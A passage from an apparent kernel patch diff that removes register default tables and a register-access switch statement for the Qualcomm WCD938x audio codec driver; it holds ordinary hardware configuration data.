+-	{WCD938X_RX_BIAS_HPH_RDAC_LDO,                         0x88},
+-	{WCD938X_RX_BIAS_HPH_CNP1,                             0x82},
+-	{WCD938X_RX_BIAS_HPH_LOWPOWER,                         0x82},
+-	{WCD938X_RX_BIAS_AUX_DAC,                              0xA0},
+-	{WCD938X_RX_BIAS_AUX_AMP,                              0xAA},
+-	{WCD938X_RX_BIAS_VNEGDAC_BLEEDER,                      0x50},
+-	{WCD938X_RX_BIAS_MISC,                                 0x00},
+-	{WCD938X_RX_BIAS_BUCK_RST,                             0x08},
+-	{WCD938X_RX_BIAS_BUCK_VREF_ERRAMP,                     0x44},
+-	{WCD938X_RX_BIAS_FLYB_ERRAMP,                          0x40},
+-	{WCD938X_RX_BIAS_FLYB_BUFF,                            0xAA},
+-	{WCD938X_RX_BIAS_FLYB_MID_RST,                         0x14},
+-	{WCD938X_HPH_L_STATUS,                                 0x04},
+-	{WCD938X_HPH_R_STATUS,                                 0x04},
+-	{WCD938X_HPH_CNP_EN,                                   0x80},
+-	{WCD938X_HPH_CNP_WG_CTL,                               0x9A},
+-	{WCD938X_HPH_CNP_WG_TIME,                              0x14},
+-	{WCD938X_HPH_OCP_CTL,                                  0x28},
+-	{WCD938X_HPH_AUTO_CHOP,                                0x16},
+-	{WCD938X_HPH_CHOP_CTL,                                 0x83},
+-	{WCD938X_HPH_PA_CTL1,                                  0x46},
+-	{WCD938X_HPH_PA_CTL2,                                  0x50},
+-	{WCD938X_HPH_L_EN,                                     0x80},
+-	{WCD938X_HPH_L_TEST,                                   0xE0},
+-	{WCD938X_HPH_L_ATEST,                                  0x50},
+-	{WCD938X_HPH_R_EN,                                     0x80},
+-	{WCD938X_HPH_R_TEST,                                   0xE0},
+-	{WCD938X_HPH_R_ATEST,                                  0x54},
+-	{WCD938X_HPH_RDAC_CLK_CTL1,                            0x99},
+-	{WCD938X_HPH_RDAC_CLK_CTL2,                            0x9B},
+-	{WCD938X_HPH_RDAC_LDO_CTL,                             0x33},
+-	{WCD938X_HPH_RDAC_CHOP_CLK_LP_CTL,                     0x00},
+-	{WCD938X_HPH_REFBUFF_UHQA_CTL,                         0x68},
+-	{WCD938X_HPH_REFBUFF_LP_CTL,                           0x0E},
+-	{WCD938X_HPH_L_DAC_CTL,                                0x20},
+-	{WCD938X_HPH_R_DAC_CTL,                                0x20},
+-	{WCD938X_HPH_SURGE_HPHLR_SURGE_COMP_SEL,               0x55},
+-	{WCD938X_HPH_SURGE_HPHLR_SURGE_EN,                     0x19},
+-	{WCD938X_HPH_SURGE_HPHLR_SURGE_MISC1,                  0xA0},
+-	{WCD938X_HPH_SURGE_HPHLR_SURGE_STATUS,                 0x00},
+-	{WCD938X_EAR_EAR_EN_REG,                               0x22},
+-	{WCD938X_EAR_EAR_PA_CON,                               0x44},
+-	{WCD938X_EAR_EAR_SP_CON,                               0xDB},
+-	{WCD938X_EAR_EAR_DAC_CON,                              0x80},
+-	{WCD938X_EAR_EAR_CNP_FSM_CON,                          0xB2},
+-	{WCD938X_EAR_TEST_CTL,                                 0x00},
+-	{WCD938X_EAR_STATUS_REG_1,                             0x00},
+-	{WCD938X_EAR_STATUS_REG_2,                             0x08},
+-	{WCD938X_ANA_NEW_PAGE_REGISTER,                        0x00},
+-	{WCD938X_HPH_NEW_ANA_HPH2,                             0x00},
+-	{WCD938X_HPH_NEW_ANA_HPH3,                             0x00},
+-	{WCD938X_SLEEP_CTL,                                    0x16},
+-	{WCD938X_SLEEP_WATCHDOG_CTL,                           0x00},
+-	{WCD938X_MBHC_NEW_ELECT_REM_CLAMP_CTL,                 0x00},
+-	{WCD938X_MBHC_NEW_CTL_1,                               0x02},
+-	{WCD938X_MBHC_NEW_CTL_2,                               0x05},
+-	{WCD938X_MBHC_NEW_PLUG_DETECT_CTL,                     0xE9},
+-	{WCD938X_MBHC_NEW_ZDET_ANA_CTL,                        0x0F},
+-	{WCD938X_MBHC_NEW_ZDET_RAMP_CTL,                       0x00},
+-	{WCD938X_MBHC_NEW_FSM_STATUS,                          0x00},
+-	{WCD938X_MBHC_NEW_ADC_RESULT,                          0x00},
+-	{WCD938X_TX_NEW_AMIC_MUX_CFG,                          0x00},
+-	{WCD938X_AUX_AUXPA,                                    0x00},
+-	{WCD938X_LDORXTX_MODE,                                 0x0C},
+-	{WCD938X_LDORXTX_CONFIG,                               0x10},
+-	{WCD938X_DIE_CRACK_DIE_CRK_DET_EN,                     0x00},
+-	{WCD938X_DIE_CRACK_DIE_CRK_DET_OUT,                    0x00},
+-	{WCD938X_HPH_NEW_INT_RDAC_GAIN_CTL,                    0x40},
+-	{WCD938X_HPH_NEW_INT_RDAC_HD2_CTL_L,                   0x81},
+-	{WCD938X_HPH_NEW_INT_RDAC_VREF_CTL,                    0x10},
+-	{WCD938X_HPH_NEW_INT_RDAC_OVERRIDE_CTL,                0x00},
+-	{WCD938X_HPH_NEW_INT_RDAC_HD2_CTL_R,                   0x81},
+-	{WCD938X_HPH_NEW_INT_PA_MISC1,                         0x22},
+-	{WCD938X_HPH_NEW_INT_PA_MISC2,                         0x00},
+-	{WCD938X_HPH_NEW_INT_PA_RDAC_MISC,                     0x00},
+-	{WCD938X_HPH_NEW_INT_HPH_TIMER1,                       0xFE},
+-	{WCD938X_HPH_NEW_INT_HPH_TIMER2,                       0x02},
+-	{WCD938X_HPH_NEW_INT_HPH_TIMER3,                       0x4E},
+-	{WCD938X_HPH_NEW_INT_HPH_TIMER4,                       0x54},
+-	{WCD938X_HPH_NEW_INT_PA_RDAC_MISC2,                    0x00},
+-	{WCD938X_HPH_NEW_INT_PA_RDAC_MISC3,                    0x00},
+-	{WCD938X_HPH_NEW_INT_RDAC_HD2_CTL_L_NEW,               0x90},
+-	{WCD938X_HPH_NEW_INT_RDAC_HD2_CTL_R_NEW,               0x90},
+-	{WCD938X_RX_NEW_INT_HPH_RDAC_BIAS_LOHIFI,              0x62},
+-	{WCD938X_RX_NEW_INT_HPH_RDAC_BIAS_ULP,                 0x01},
+-	{WCD938X_RX_NEW_INT_HPH_RDAC_LDO_LP,                   0x11},
+-	{WCD938X_MBHC_NEW_INT_MOISTURE_DET_DC_CTRL,            0x57},
+-	{WCD938X_MBHC_NEW_INT_MOISTURE_DET_POLLING_CTRL,       0x01},
+-	{WCD938X_MBHC_NEW_INT_MECH_DET_CURRENT,                0x00},
+-	{WCD938X_MBHC_NEW_INT_SPARE_2,                         0x00},
+-	{WCD938X_EAR_INT_NEW_EAR_CHOPPER_CON,                  0xA8},
+-	{WCD938X_EAR_INT_NEW_CNP_VCM_CON1,                     0x42},
+-	{WCD938X_EAR_INT_NEW_CNP_VCM_CON2,                     0x22},
+-	{WCD938X_EAR_INT_NEW_EAR_DYNAMIC_BIAS,                 0x00},
+-	{WCD938X_AUX_INT_EN_REG,                               0x00},
+-	{WCD938X_AUX_INT_PA_CTRL,                              0x06},
+-	{WCD938X_AUX_INT_SP_CTRL,                              0xD2},
+-	{WCD938X_AUX_INT_DAC_CTRL,                             0x80},
+-	{WCD938X_AUX_INT_CLK_CTRL,                             0x50},
+-	{WCD938X_AUX_INT_TEST_CTRL,                            0x00},
+-	{WCD938X_AUX_INT_STATUS_REG,                           0x00},
+-	{WCD938X_AUX_INT_MISC,                                 0x00},
+-	{WCD938X_LDORXTX_INT_BIAS,                             0x6E},
+-	{WCD938X_LDORXTX_INT_STB_LOADS_DTEST,                  0x50},
+-	{WCD938X_LDORXTX_INT_TEST0,                            0x1C},
+-	{WCD938X_LDORXTX_INT_STARTUP_TIMER,                    0xFF},
+-	{WCD938X_LDORXTX_INT_TEST1,                            0x1F},
+-	{WCD938X_LDORXTX_INT_STATUS,                           0x00},
+-	{WCD938X_SLEEP_INT_WATCHDOG_CTL_1,                     0x0A},
+-	{WCD938X_SLEEP_INT_WATCHDOG_CTL_2,                     0x0A},
+-	{WCD938X_DIE_CRACK_INT_DIE_CRK_DET_INT1,               0x02},
+-	{WCD938X_DIE_CRACK_INT_DIE_CRK_DET_INT2,               0x60},
+-	{WCD938X_TX_COM_NEW_INT_TXFE_DIVSTOP_L2,               0xFF},
+-	{WCD938X_TX_COM_NEW_INT_TXFE_DIVSTOP_L1,               0x7F},
+-	{WCD938X_TX_COM_NEW_INT_TXFE_DIVSTOP_L0,               0x3F},
+-	{WCD938X_TX_COM_NEW_INT_TXFE_DIVSTOP_ULP1P2M,          0x1F},
+-	{WCD938X_TX_COM_NEW_INT_TXFE_DIVSTOP_ULP0P6M,          0x0F},
+-	{WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG1_L2L1,          0xD7},
+-	{WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG1_L0,            0xC8},
+-	{WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG1_ULP,           0xC6},
+-	{WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG2MAIN_L2L1,      0xD5},
+-	{WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG2MAIN_L0,        0xCA},
+-	{WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG2MAIN_ULP,       0x05},
+-	{WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG2CASC_L2L1L0,    0xA5},
+-	{WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG2CASC_ULP,       0x13},
+-	{WCD938X_TX_COM_NEW_INT_TXADC_SCBIAS_L2L1,             0x88},
+-	{WCD938X_TX_COM_NEW_INT_TXADC_SCBIAS_L0ULP,            0x42},
+-	{WCD938X_TX_COM_NEW_INT_TXADC_INT_L2,                  0xFF},
+-	{WCD938X_TX_COM_NEW_INT_TXADC_INT_L1,                  0x64},
+-	{WCD938X_TX_COM_NEW_INT_TXADC_INT_L0,                  0x64},
+-	{WCD938X_TX_COM_NEW_INT_TXADC_INT_ULP,                 0x77},
+-	{WCD938X_DIGITAL_PAGE_REGISTER,                        0x00},
+-	{WCD938X_DIGITAL_CHIP_ID0,                             0x00},
+-	{WCD938X_DIGITAL_CHIP_ID1,                             0x00},
+-	{WCD938X_DIGITAL_CHIP_ID2,                             0x0D},
+-	{WCD938X_DIGITAL_CHIP_ID3,                             0x01},
+-	{WCD938X_DIGITAL_SWR_TX_CLK_RATE,                      0x00},
+-	{WCD938X_DIGITAL_CDC_RST_CTL,                          0x03},
+-	{WCD938X_DIGITAL_TOP_CLK_CFG,                          0x00},
+-	{WCD938X_DIGITAL_CDC_ANA_CLK_CTL,                      0x00},
+-	{WCD938X_DIGITAL_CDC_DIG_CLK_CTL,                      0xF0},
+-	{WCD938X_DIGITAL_SWR_RST_EN,                           0x00},
+-	{WCD938X_DIGITAL_CDC_PATH_MODE,                        0x55},
+-	{WCD938X_DIGITAL_CDC_RX_RST,                           0x00},
+-	{WCD938X_DIGITAL_CDC_RX0_CTL,                          0xFC},
+-	{WCD938X_DIGITAL_CDC_RX1_CTL,                          0xFC},
+-	{WCD938X_DIGITAL_CDC_RX2_CTL,                          0xFC},
+-	{WCD938X_DIGITAL_CDC_TX_ANA_MODE_0_1,                  0x00},
+-	{WCD938X_DIGITAL_CDC_TX_ANA_MODE_2_3,                  0x00},
+-	{WCD938X_DIGITAL_CDC_COMP_CTL_0,                       0x00},
+-	{WCD938X_DIGITAL_CDC_ANA_TX_CLK_CTL,                   0x1E},
+-	{WCD938X_DIGITAL_CDC_HPH_DSM_A1_0,                     0x00},
+-	{WCD938X_DIGITAL_CDC_HPH_DSM_A1_1,                     0x01},
+-	{WCD938X_DIGITAL_CDC_HPH_DSM_A2_0,                     0x63},
+-	{WCD938X_DIGITAL_CDC_HPH_DSM_A2_1,                     0x04},
+-	{WCD938X_DIGITAL_CDC_HPH_DSM_A3_0,                     0xAC},
+-	{WCD938X_DIGITAL_CDC_HPH_DSM_A3_1,                     0x04},
+-	{WCD938X_DIGITAL_CDC_HPH_DSM_A4_0,                     0x1A},
+-	{WCD938X_DIGITAL_CDC_HPH_DSM_A4_1,                     0x03},
+-	{WCD938X_DIGITAL_CDC_HPH_DSM_A5_0,                     0xBC},
+-	{WCD938X_DIGITAL_CDC_HPH_DSM_A5_1,                     0x02},
+-	{WCD938X_DIGITAL_CDC_HPH_DSM_A6_0,                     0xC7},
+-	{WCD938X_DIGITAL_CDC_HPH_DSM_A7_0,                     0xF8},
+-	{WCD938X_DIGITAL_CDC_HPH_DSM_C_0,                      0x47},
+-	{WCD938X_DIGITAL_CDC_HPH_DSM_C_1,                      0x43},
+-	{WCD938X_DIGITAL_CDC_HPH_DSM_C_2,                      0xB1},
+-	{WCD938X_DIGITAL_CDC_HPH_DSM_C_3,                      0x17},
+-	{WCD938X_DIGITAL_CDC_HPH_DSM_R1,                       0x4D},
+-	{WCD938X_DIGITAL_CDC_HPH_DSM_R2,                       0x29},
+-	{WCD938X_DIGITAL_CDC_HPH_DSM_R3,                       0x34},
+-	{WCD938X_DIGITAL_CDC_HPH_DSM_R4,                       0x59},
+-	{WCD938X_DIGITAL_CDC_HPH_DSM_R5,                       0x66},
+-	{WCD938X_DIGITAL_CDC_HPH_DSM_R6,                       0x87},
+-	{WCD938X_DIGITAL_CDC_HPH_DSM_R7,                       0x64},
+-	{WCD938X_DIGITAL_CDC_AUX_DSM_A1_0,                     0x00},
+-	{WCD938X_DIGITAL_CDC_AUX_DSM_A1_1,                     0x01},
+-	{WCD938X_DIGITAL_CDC_AUX_DSM_A2_0,                     0x96},
+-	{WCD938X_DIGITAL_CDC_AUX_DSM_A2_1,                     0x09},
+-	{WCD938X_DIGITAL_CDC_AUX_DSM_A3_0,                     0xAB},
+-	{WCD938X_DIGITAL_CDC_AUX_DSM_A3_1,                     0x05},
+-	{WCD938X_DIGITAL_CDC_AUX_DSM_A4_0,                     0x1C},
+-	{WCD938X_DIGITAL_CDC_AUX_DSM_A4_1,                     0x02},
+-	{WCD938X_DIGITAL_CDC_AUX_DSM_A5_0,                     0x17},
+-	{WCD938X_DIGITAL_CDC_AUX_DSM_A5_1,                     0x02},
+-	{WCD938X_DIGITAL_CDC_AUX_DSM_A6_0,                     0xAA},
+-	{WCD938X_DIGITAL_CDC_AUX_DSM_A7_0,                     0xE3},
+-	{WCD938X_DIGITAL_CDC_AUX_DSM_C_0,                      0x69},
+-	{WCD938X_DIGITAL_CDC_AUX_DSM_C_1,                      0x54},
+-	{WCD938X_DIGITAL_CDC_AUX_DSM_C_2,                      0x02},
+-	{WCD938X_DIGITAL_CDC_AUX_DSM_C_3,                      0x15},
+-	{WCD938X_DIGITAL_CDC_AUX_DSM_R1,                       0xA4},
+-	{WCD938X_DIGITAL_CDC_AUX_DSM_R2,                       0xB5},
+-	{WCD938X_DIGITAL_CDC_AUX_DSM_R3,                       0x86},
+-	{WCD938X_DIGITAL_CDC_AUX_DSM_R4,                       0x85},
+-	{WCD938X_DIGITAL_CDC_AUX_DSM_R5,                       0xAA},
+-	{WCD938X_DIGITAL_CDC_AUX_DSM_R6,                       0xE2},
+-	{WCD938X_DIGITAL_CDC_AUX_DSM_R7,                       0x62},
+-	{WCD938X_DIGITAL_CDC_HPH_GAIN_RX_0,                    0x55},
+-	{WCD938X_DIGITAL_CDC_HPH_GAIN_RX_1,                    0xA9},
+-	{WCD938X_DIGITAL_CDC_HPH_GAIN_DSD_0,                   0x3D},
+-	{WCD938X_DIGITAL_CDC_HPH_GAIN_DSD_1,                   0x2E},
+-	{WCD938X_DIGITAL_CDC_HPH_GAIN_DSD_2,                   0x01},
+-	{WCD938X_DIGITAL_CDC_AUX_GAIN_DSD_0,                   0x00},
+-	{WCD938X_DIGITAL_CDC_AUX_GAIN_DSD_1,                   0xFC},
+-	{WCD938X_DIGITAL_CDC_AUX_GAIN_DSD_2,                   0x01},
+-	{WCD938X_DIGITAL_CDC_HPH_GAIN_CTL,                     0x00},
+-	{WCD938X_DIGITAL_CDC_AUX_GAIN_CTL,                     0x00},
+-	{WCD938X_DIGITAL_CDC_EAR_PATH_CTL,                     0x00},
+-	{WCD938X_DIGITAL_CDC_SWR_CLH,                          0x00},
+-	{WCD938X_DIGITAL_SWR_CLH_BYP,                          0x00},
+-	{WCD938X_DIGITAL_CDC_TX0_CTL,                          0x68},
+-	{WCD938X_DIGITAL_CDC_TX1_CTL,                          0x68},
+-	{WCD938X_DIGITAL_CDC_TX2_CTL,                          0x68},
+-	{WCD938X_DIGITAL_CDC_TX_RST,                           0x00},
+-	{WCD938X_DIGITAL_CDC_REQ_CTL,                          0x01},
+-	{WCD938X_DIGITAL_CDC_RST,                              0x00},
+-	{WCD938X_DIGITAL_CDC_AMIC_CTL,                         0x0F},
+-	{WCD938X_DIGITAL_CDC_DMIC_CTL,                         0x04},
+-	{WCD938X_DIGITAL_CDC_DMIC1_CTL,                        0x01},
+-	{WCD938X_DIGITAL_CDC_DMIC2_CTL,                        0x01},
+-	{WCD938X_DIGITAL_CDC_DMIC3_CTL,                        0x01},
+-	{WCD938X_DIGITAL_CDC_DMIC4_CTL,                        0x01},
+-	{WCD938X_DIGITAL_EFUSE_PRG_CTL,                        0x00},
+-	{WCD938X_DIGITAL_EFUSE_CTL,                            0x2B},
+-	{WCD938X_DIGITAL_CDC_DMIC_RATE_1_2,                    0x11},
+-	{WCD938X_DIGITAL_CDC_DMIC_RATE_3_4,                    0x11},
+-	{WCD938X_DIGITAL_PDM_WD_CTL0,                          0x00},
+-	{WCD938X_DIGITAL_PDM_WD_CTL1,                          0x00},
+-	{WCD938X_DIGITAL_PDM_WD_CTL2,                          0x00},
+-	{WCD938X_DIGITAL_INTR_MODE,                            0x00},
+-	{WCD938X_DIGITAL_INTR_MASK_0,                          0xFF},
+-	{WCD938X_DIGITAL_INTR_MASK_1,                          0xFF},
+-	{WCD938X_DIGITAL_INTR_MASK_2,                          0x3F},
+-	{WCD938X_DIGITAL_INTR_STATUS_0,                        0x00},
+-	{WCD938X_DIGITAL_INTR_STATUS_1,                        0x00},
+-	{WCD938X_DIGITAL_INTR_STATUS_2,                        0x00},
+-	{WCD938X_DIGITAL_INTR_CLEAR_0,                         0x00},
+-	{WCD938X_DIGITAL_INTR_CLEAR_1,                         0x00},
+-	{WCD938X_DIGITAL_INTR_CLEAR_2,                         0x00},
+-	{WCD938X_DIGITAL_INTR_LEVEL_0,                         0x00},
+-	{WCD938X_DIGITAL_INTR_LEVEL_1,                         0x00},
+-	{WCD938X_DIGITAL_INTR_LEVEL_2,                         0x00},
+-	{WCD938X_DIGITAL_INTR_SET_0,                           0x00},
+-	{WCD938X_DIGITAL_INTR_SET_1,                           0x00},
+-	{WCD938X_DIGITAL_INTR_SET_2,                           0x00},
+-	{WCD938X_DIGITAL_INTR_TEST_0,                          0x00},
+-	{WCD938X_DIGITAL_INTR_TEST_1,                          0x00},
+-	{WCD938X_DIGITAL_INTR_TEST_2,                          0x00},
+-	{WCD938X_DIGITAL_TX_MODE_DBG_EN,                       0x00},
+-	{WCD938X_DIGITAL_TX_MODE_DBG_0_1,                      0x00},
+-	{WCD938X_DIGITAL_TX_MODE_DBG_2_3,                      0x00},
+-	{WCD938X_DIGITAL_LB_IN_SEL_CTL,                        0x00},
+-	{WCD938X_DIGITAL_LOOP_BACK_MODE,                       0x00},
+-	{WCD938X_DIGITAL_SWR_DAC_TEST,                         0x00},
+-	{WCD938X_DIGITAL_SWR_HM_TEST_RX_0,                     0x40},
+-	{WCD938X_DIGITAL_SWR_HM_TEST_TX_0,                     0x40},
+-	{WCD938X_DIGITAL_SWR_HM_TEST_RX_1,                     0x00},
+-	{WCD938X_DIGITAL_SWR_HM_TEST_TX_1,                     0x00},
+-	{WCD938X_DIGITAL_SWR_HM_TEST_TX_2,                     0x00},
+-	{WCD938X_DIGITAL_SWR_HM_TEST_0,                        0x00},
+-	{WCD938X_DIGITAL_SWR_HM_TEST_1,                        0x00},
+-	{WCD938X_DIGITAL_PAD_CTL_SWR_0,                        0x8F},
+-	{WCD938X_DIGITAL_PAD_CTL_SWR_1,                        0x06},
+-	{WCD938X_DIGITAL_I2C_CTL,                              0x00},
+-	{WCD938X_DIGITAL_CDC_TX_TANGGU_SW_MODE,                0x00},
+-	{WCD938X_DIGITAL_EFUSE_TEST_CTL_0,                     0x00},
+-	{WCD938X_DIGITAL_EFUSE_TEST_CTL_1,                     0x00},
+-	{WCD938X_DIGITAL_EFUSE_T_DATA_0,                       0x00},
+-	{WCD938X_DIGITAL_EFUSE_T_DATA_1,                       0x00},
+-	{WCD938X_DIGITAL_PAD_CTL_PDM_RX0,                      0xF1},
+-	{WCD938X_DIGITAL_PAD_CTL_PDM_RX1,                      0xF1},
+-	{WCD938X_DIGITAL_PAD_CTL_PDM_TX0,                      0xF1},
+-	{WCD938X_DIGITAL_PAD_CTL_PDM_TX1,                      0xF1},
+-	{WCD938X_DIGITAL_PAD_CTL_PDM_TX2,                      0xF1},
+-	{WCD938X_DIGITAL_PAD_INP_DIS_0,                        0x00},
+-	{WCD938X_DIGITAL_PAD_INP_DIS_1,                        0x00},
+-	{WCD938X_DIGITAL_DRIVE_STRENGTH_0,                     0x00},
+-	{WCD938X_DIGITAL_DRIVE_STRENGTH_1,                     0x00},
+-	{WCD938X_DIGITAL_DRIVE_STRENGTH_2,                     0x00},
+-	{WCD938X_DIGITAL_RX_DATA_EDGE_CTL,                     0x1F},
+-	{WCD938X_DIGITAL_TX_DATA_EDGE_CTL,                     0x80},
+-	{WCD938X_DIGITAL_GPIO_MODE,                            0x00},
+-	{WCD938X_DIGITAL_PIN_CTL_OE,                           0x00},
+-	{WCD938X_DIGITAL_PIN_CTL_DATA_0,                       0x00},
+-	{WCD938X_DIGITAL_PIN_CTL_DATA_1,                       0x00},
+-	{WCD938X_DIGITAL_PIN_STATUS_0,                         0x00},
+-	{WCD938X_DIGITAL_PIN_STATUS_1,                         0x00},
+-	{WCD938X_DIGITAL_DIG_DEBUG_CTL,                        0x00},
+-	{WCD938X_DIGITAL_DIG_DEBUG_EN,                         0x00},
+-	{WCD938X_DIGITAL_ANA_CSR_DBG_ADD,                      0x00},
+-	{WCD938X_DIGITAL_ANA_CSR_DBG_CTL,                      0x48},
+-	{WCD938X_DIGITAL_SSP_DBG,                              0x00},
+-	{WCD938X_DIGITAL_MODE_STATUS_0,                        0x00},
+-	{WCD938X_DIGITAL_MODE_STATUS_1,                        0x00},
+-	{WCD938X_DIGITAL_SPARE_0,                              0x00},
+-	{WCD938X_DIGITAL_SPARE_1,                              0x00},
+-	{WCD938X_DIGITAL_SPARE_2,                              0x00},
+-	{WCD938X_DIGITAL_EFUSE_REG_0,                          0x00},
+-	{WCD938X_DIGITAL_EFUSE_REG_1,                          0xFF},
+-	{WCD938X_DIGITAL_EFUSE_REG_2,                          0xFF},
+-	{WCD938X_DIGITAL_EFUSE_REG_3,                          0xFF},
+-	{WCD938X_DIGITAL_EFUSE_REG_4,                          0xFF},
+-	{WCD938X_DIGITAL_EFUSE_REG_5,                          0xFF},
+-	{WCD938X_DIGITAL_EFUSE_REG_6,                          0xFF},
+-	{WCD938X_DIGITAL_EFUSE_REG_7,                          0xFF},
+-	{WCD938X_DIGITAL_EFUSE_REG_8,                          0xFF},
+-	{WCD938X_DIGITAL_EFUSE_REG_9,                          0xFF},
+-	{WCD938X_DIGITAL_EFUSE_REG_10,                         0xFF},
+-	{WCD938X_DIGITAL_EFUSE_REG_11,                         0xFF},
+-	{WCD938X_DIGITAL_EFUSE_REG_12,                         0xFF},
+-	{WCD938X_DIGITAL_EFUSE_REG_13,                         0xFF},
+-	{WCD938X_DIGITAL_EFUSE_REG_14,                         0xFF},
+-	{WCD938X_DIGITAL_EFUSE_REG_15,                         0xFF},
+-	{WCD938X_DIGITAL_EFUSE_REG_16,                         0xFF},
+-	{WCD938X_DIGITAL_EFUSE_REG_17,                         0xFF},
+-	{WCD938X_DIGITAL_EFUSE_REG_18,                         0xFF},
+-	{WCD938X_DIGITAL_EFUSE_REG_19,                         0xFF},
+-	{WCD938X_DIGITAL_EFUSE_REG_20,                         0x0E},
+-	{WCD938X_DIGITAL_EFUSE_REG_21,                         0x00},
+-	{WCD938X_DIGITAL_EFUSE_REG_22,                         0x00},
+-	{WCD938X_DIGITAL_EFUSE_REG_23,                         0xF8},
+-	{WCD938X_DIGITAL_EFUSE_REG_24,                         0x16},
+-	{WCD938X_DIGITAL_EFUSE_REG_25,                         0x00},
+-	{WCD938X_DIGITAL_EFUSE_REG_26,                         0x00},
+-	{WCD938X_DIGITAL_EFUSE_REG_27,                         0x00},
+-	{WCD938X_DIGITAL_EFUSE_REG_28,                         0x00},
+-	{WCD938X_DIGITAL_EFUSE_REG_29,                         0x00},
+-	{WCD938X_DIGITAL_EFUSE_REG_30,                         0x00},
+-	{WCD938X_DIGITAL_EFUSE_REG_31,                         0x00},
+-	{WCD938X_DIGITAL_TX_REQ_FB_CTL_0,                      0x88},
+-	{WCD938X_DIGITAL_TX_REQ_FB_CTL_1,                      0x88},
+-	{WCD938X_DIGITAL_TX_REQ_FB_CTL_2,                      0x88},
+-	{WCD938X_DIGITAL_TX_REQ_FB_CTL_3,                      0x88},
+-	{WCD938X_DIGITAL_TX_REQ_FB_CTL_4,                      0x88},
+-	{WCD938X_DIGITAL_DEM_BYPASS_DATA0,                     0x55},
+-	{WCD938X_DIGITAL_DEM_BYPASS_DATA1,                     0x55},
+-	{WCD938X_DIGITAL_DEM_BYPASS_DATA2,                     0x55},
+-	{WCD938X_DIGITAL_DEM_BYPASS_DATA3,                     0x01},
+-};
+-
+-static bool wcd938x_rdwr_register(struct device *dev, unsigned int reg)
+-{
+-	switch (reg) {
+-	case WCD938X_ANA_PAGE_REGISTER:
+-	case WCD938X_ANA_BIAS:
+-	case WCD938X_ANA_RX_SUPPLIES:
+-	case WCD938X_ANA_HPH:
+-	case WCD938X_ANA_EAR:
+-	case WCD938X_ANA_EAR_COMPANDER_CTL:
+-	case WCD938X_ANA_TX_CH1:
+-	case WCD938X_ANA_TX_CH2:
+-	case WCD938X_ANA_TX_CH3:
+-	case WCD938X_ANA_TX_CH4:
+-	case WCD938X_ANA_MICB1_MICB2_DSP_EN_LOGIC:
+-	case WCD938X_ANA_MICB3_DSP_EN_LOGIC:
+-	case WCD938X_ANA_MBHC_MECH:
+-	case WCD938X_ANA_MBHC_ELECT:
+-	case WCD938X_ANA_MBHC_ZDET:
+-	case WCD938X_ANA_MBHC_BTN0:
+-	case WCD938X_ANA_MBHC_BTN1:
+-	case WCD938X_ANA_MBHC_BTN2:
+-	case WCD938X_ANA_MBHC_BTN3:
+-	case WCD938X_ANA_MBHC_BTN4:
+-	case WCD938X_ANA_MBHC_BTN5:
+-	case WCD938X_ANA_MBHC_BTN6:
+-	case WCD938X_ANA_MBHC_BTN7:
+-	case WCD938X_ANA_MICB1:
+-	case WCD938X_ANA_MICB2:
+-	case WCD938X_ANA_MICB2_RAMP:
+-	case WCD938X_ANA_MICB3:
+-	case WCD938X_ANA_MICB4:
+-	case WCD938X_BIAS_CTL:
+-	case WCD938X_BIAS_VBG_FINE_ADJ:
+-	case WCD938X_LDOL_VDDCX_ADJUST:
+-	case WCD938X_LDOL_DISABLE_LDOL:
+-	case WCD938X_MBHC_CTL_CLK:
+-	case WCD938X_MBHC_CTL_ANA:
+-	case WCD938X_MBHC_CTL_SPARE_1:
+-	case WCD938X_MBHC_CTL_SPARE_2:
+-	case WCD938X_MBHC_CTL_BCS:
+-	case WCD938X_MBHC_TEST_CTL:
+-	case WCD938X_LDOH_MODE:
+-	case WCD938X_LDOH_BIAS:
+-	case WCD938X_LDOH_STB_LOADS:
+-	case WCD938X_LDOH_SLOWRAMP:
+-	case WCD938X_MICB1_TEST_CTL_1:
+-	case WCD938X_MICB1_TEST_CTL_2:
+-	case WCD938X_MICB1_TEST_CTL_3:
+-	case WCD938X_MICB2_TEST_CTL_1:
+-	case WCD938X_MICB2_TEST_CTL_2:
+-	case WCD938X_MICB2_TEST_CTL_3:
+-	case WCD938X_MICB3_TEST_CTL_1:
+-	case WCD938X_MICB3_TEST_CTL_2:
+-	case WCD938X_MICB3_TEST_CTL_3:
+-	case WCD938X_MICB4_TEST_CTL_1:
+-	case WCD938X_MICB4_TEST_CTL_2:
+-	case WCD938X_MICB4_TEST_CTL_3:
+-	case WCD938X_TX_COM_ADC_VCM:
+-	case WCD938X_TX_COM_BIAS_ATEST:
+-	case WCD938X_TX_COM_SPARE1:
+-	case WCD938X_TX_COM_SPARE2:
+-	case WCD938X_TX_COM_TXFE_DIV_CTL:
+-	case WCD938X_TX_COM_TXFE_DIV_START:
+-	case WCD938X_TX_COM_SPARE3:
+-	case WCD938X_TX_COM_SPARE4:
+-	case WCD938X_TX_1_2_TEST_EN:
+-	case WCD938X_TX_1_2_ADC_IB:
+-	case WCD938X_TX_1_2_ATEST_REFCTL:
+-	case WCD938X_TX_1_2_TEST_CTL:
+-	case WCD938X_TX_1_2_TEST_BLK_EN1:
+-	case WCD938X_TX_1_2_TXFE1_CLKDIV:
+-	case WCD938X_TX_3_4_TEST_EN:
+-	case WCD938X_TX_3_4_ADC_IB:
+-	case WCD938X_TX_3_4_ATEST_REFCTL:
+-	case WCD938X_TX_3_4_TEST_CTL:
+-	case WCD938X_TX_3_4_TEST_BLK_EN3:
+-	case WCD938X_TX_3_4_TXFE3_CLKDIV:
+-	case WCD938X_TX_3_4_TEST_BLK_EN2:
+-	case WCD938X_TX_3_4_TXFE2_CLKDIV:
+-	case WCD938X_TX_3_4_SPARE1:
+-	case WCD938X_TX_3_4_TEST_BLK_EN4:
+-	case WCD938X_TX_3_4_TXFE4_CLKDIV:
+-	case WCD938X_TX_3_4_SPARE2:
+-	case WCD938X_CLASSH_MODE_1:
+-	case WCD938X_CLASSH_MODE_2:
+-	case WCD938X_CLASSH_MODE_3:
+-	case WCD938X_CLASSH_CTRL_VCL_1:
